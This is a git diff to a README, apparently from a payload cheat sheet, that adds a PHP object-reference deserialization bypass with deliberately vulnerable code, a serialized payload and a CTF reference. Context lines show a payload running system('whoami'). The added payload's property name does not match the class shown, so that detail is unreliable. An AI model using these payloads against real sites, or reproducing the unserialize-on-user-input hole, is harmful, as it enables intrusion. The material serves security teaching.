diff --git a/PHP serialization/README.md b/PHP serialization/README.md
index a0c1257..765d7b9 100644
--- a/PHP serialization/README.md	
+++ b/PHP serialization/README.md	
@@ -45,6 +45,8 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}
 
 ## Authentication bypass
 
+### Type juggling
+
 Vulnerable code:
 
 ```php
@@ -66,6 +68,40 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
 
 Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
 
+### Object reference
+
+Vulnerable code:
+
+```php
+<?php
+class Object
+{
+  var $guess;
+  var $secretCode;
+}
+
+$obj = unserialize($_GET['input']);
+
+if($obj) {
+    $obj->secretCode = rand(500000,999999);
+    if($obj->guess === $obj->secretCode) {
+        echo "Win";
+    }
+}
+?>
+```
+
+Payload:
+
+```
+O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
+```
+
+Ref: 
+
+- [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
+- [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
+
 ## Others exploits
 
 Reverse Shell
@@ -98,3 +134,4 @@ echo urlencode(serialize(new PHPObjectInjection));
 
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
 * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
+* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)